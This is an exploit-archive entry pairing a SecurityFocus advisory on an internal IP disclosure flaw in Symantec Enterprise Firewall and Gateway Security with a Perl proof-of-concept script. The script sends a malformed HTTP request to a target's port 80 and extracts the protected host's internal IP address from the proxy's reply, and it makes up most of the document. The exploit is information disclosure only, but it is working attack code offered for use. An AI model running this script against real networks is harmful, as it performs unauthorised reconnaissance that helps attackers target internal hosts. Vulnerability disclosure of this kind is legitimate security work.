Symantec Enterprise Firewall / Gateway Security - HTTP Proxy Internal IP Leakage

source: https://www.securityfocus.com/bid/17936/info

Symantec Enterprise Firewall and Gateway Security products are prone to an information-disclosure weakness. 

The vendor has reported that the NAT/HTTP proxy component of the products may reveal the internal IP addresses of protected computers. 

An attacker may use this information to carry out targeted attacks against a potentially vulnerable host.

#!/usr/bin/perl
# [title] raptor firewall internal IP disclosure 'exploit'
# [mailto] research [at] sec-consult [dot} com
#
# sk0L@b4byl0n:~/home/sk0L> perl raptor-nat.pl behind.raptor.com
# waiting for timeout (this can take about 1 min.)
# behind.raptor.com: 10.238.94.67

use IO::Socket;

$| = 1;

$host = $ARGV[0] or die "$0 <host>\n";

$request = "getXXX/XXX HTTP/1.0\n\n";

my $sock = new IO::Socket::INET (
                 PeerAddr => $host,
                 PeerPort => 80,
                 Proto => 'tcp',
);

die "could not open socket: $!\n" unless $sock;

print $sock $request;

print "waiting for timeout (this can take about 1 min.)\n";

while (<$sock>) {
                 if ($_ =~ /http:\/\/(\d+\.\d+\.\d+\.\d+)XXX/) {
                                 $ip = $1;
                 }
}

if (defined($ip)) {
                 print "$host: $ip\n";
} else {
                 print "failed.\n";
}

close($sock);